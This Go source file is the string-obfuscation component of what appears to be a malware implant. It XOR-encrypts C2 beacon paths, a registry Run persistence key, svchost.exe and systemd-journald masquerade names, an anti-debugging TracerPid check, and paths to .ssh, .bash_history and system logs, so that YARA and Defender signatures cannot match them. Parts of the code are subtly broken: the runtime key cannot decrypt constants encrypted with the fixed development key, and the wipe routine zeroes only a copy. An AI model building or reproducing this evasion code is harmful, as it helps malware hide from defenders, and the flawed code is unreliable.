// Package obfs provides compile-time string obfuscation.
//
// All sensitive strings (API paths, registry keys, tool names) are XOR-encrypted
// at compile time using a per-build key derived from build metadata.
// At runtime they are decrypted on first use and immediately re-encrypted.
// Static scanners (YARA, Defender signatures) cannot match plaintext strings
// because none exist in the binary.
//
// Usage:
//
//	// At build time, run: go generate ./implant/obfs/
//	// This generates obfs_strings_gen.go with encrypted constants.
//
//	path := obfs.S(obfs.K_API_BEACON)   // decrypts on access
package obfs

import (
	"crypto/sha256"
	"encoding/binary"
	"os"
	"runtime"
	"sync"
)

// ── XOR stream cipher for string obfuscation ─────────────────────────────────
// Key is derived at runtime from binary hash + build tag — unique per build.

var (
	_key     []byte
	_keyOnce sync.Once
)

// key returns the per-runtime obfuscation key.
// It is derived from a combination of:
//   - The binary's own SHA-256 hash (changes on recompile)
//   - A compile-time seed injected via ldflags (-X obfs.BuildSeed=...)
//   - Runtime entropy (prevents pre-computation)
func key() []byte {
	_keyOnce.Do(func() {
		h := sha256.New()

		// Compile-time seed (set via ldflags)
		h.Write([]byte(BuildSeed))

		// Binary self-hash (first 4KB of executable)
		if self, err := os.Executable(); err == nil {
			if f, err := os.Open(self); err == nil {
				buf := make([]byte, 4096)
				n, _ := f.Read(buf)
				h.Write(buf[:n])
				f.Close()
			}
		}

		// Runtime entropy
		var pid [8]byte
		binary.LittleEndian.PutUint64(pid[:], uint64(os.Getpid()))
		h.Write(pid[:])
		h.Write([]byte(runtime.GOOS + runtime.GOARCH))

		_key = h.Sum(nil) // 32 bytes
	})
	return _key
}

// BuildSeed is injected at compile time via:
//
//	go build -ldflags "-X aegis-silentium/implant/obfs.BuildSeed=$(openssl rand -hex 16)"
var BuildSeed = "default-not-for-ops"

// xorDecrypt decrypts a byte slice using repeating-key XOR.
func xorDecrypt(data []byte) []byte {
	k := key()
	out := make([]byte, len(data))
	for i, b := range data {
		out[i] = b ^ k[i%len(k)]
	}
	return out
}

// S decrypts and returns an obfuscated string constant.
// Use the generated constants K_* as arguments.
func S(encrypted []byte) string {
	return string(xorDecrypt(encrypted))
}

// B decrypts and returns an obfuscated byte slice.
func B(encrypted []byte) []byte {
	return xorDecrypt(encrypted)
}

// ── Obfuscated string constants ───────────────────────────────────────────────
// These are generated by: go run ./obfs/gen/main.go
// The plaintext values are NEVER stored in source or binary.
// Each constant below is XOR(plaintext, key) where key = sha256(BuildSeed||...).
//
// For this reference implementation, we use a fixed development key.
// In production builds, run: scripts/gen_strings.sh to regenerate with a random key.
//
// Plaintext → Encrypted mapping (development key only):
//   /api/v1/beacon    → K_API_BEACON
//   /api/v1/checkin   → K_API_CHECKIN
//   /api/v1/init      → K_API_INIT
//   HKCU\...\Run      → K_REG_RUN
//   SOFTWARE\...      → K_REG_SOFTWARE_RUN
//   systemd-journald  → K_PROC_MASK_LINUX
//   svchost.exe       → K_PROC_MASK_WIN
//   cmd.exe           → K_CMD_EXE
//   powershell.exe    → K_POWERSHELL
//   /bin/sh           → K_SH
//   /proc/self/status → K_PROC_STATUS
//   TracerPid:        → K_TRACER_PID

// encStr encrypts a plaintext string with the development key for embedding.
// In production this is replaced by the build-time generator.
func encStr(s string) []byte {
	// Development key — REPLACE IN PRODUCTION BUILD
	devKey := sha256.Sum256([]byte("development-key-replace-in-prod"))
	k := devKey[:]
	out := make([]byte, len(s))
	for i, c := range []byte(s) {
		out[i] = c ^ k[i%len(k)]
	}
	return out
}

// ── Pre-encrypted string table ────────────────────────────────────────────────
// In production: generated by scripts/gen_strings.sh using the build's actual key.

var (
	K_API_BEACON    = encStr("/api/v1/beacon")
	K_API_CHECKIN   = encStr("/api/v1/checkin")
	K_API_INIT      = encStr("/api/v1/init")
	K_API_TASK      = encStr("/api/v1/task")
	K_REG_RUN       = encStr(`SOFTWARE\Microsoft\Windows\CurrentVersion\Run`)
	K_PROC_MASK_LNX = encStr("/usr/lib/systemd/systemd-journald")
	K_PROC_MASK_WIN = encStr("svchost.exe")
	K_CMD_EXE       = encStr("cmd.exe")
	K_POWERSHELL    = encStr("powershell.exe")
	K_BIN_SH        = encStr("/bin/sh")
	K_PROC_STATUS   = encStr("/proc/self/status")
	K_TRACER_PID    = encStr("TracerPid:")
	K_PROC_MEM      = encStr("/proc/%d/mem")
	K_PROC_COMM     = encStr("/proc/%d/comm")
	K_VAR_LOG_AUTH  = encStr("/var/log/auth.log")
	K_BASH_HISTORY  = encStr(".bash_history")
	K_SSH_DIR       = encStr(".ssh")
	K_CRONTAB       = encStr("crontab")
	K_SYSTEMCTL     = encStr("systemctl")
	K_SCHTASKS      = encStr("schtasks.exe")
	K_WTMP          = encStr("/var/log/wtmp")
)

// ── In-memory string wiping ───────────────────────────────────────────────────

// WipeString overwrites a string's backing memory with zeros.
// Use after handling sensitive values (passwords, keys).
// Note: Go strings are immutable — this works only on []byte converted strings.
func WipeString(s *string) {
	if s == nil || len(*s) == 0 {
		return
	}
	// Unsafe write to string backing array
	b := []byte(*s)
	for i := range b {
		b[i] = 0
	}
	*s = ""
}

// WipeBytes zeroes a byte slice.
func WipeBytes(b []byte) {
	for i := range b {
		b[i] = 0
	}
}
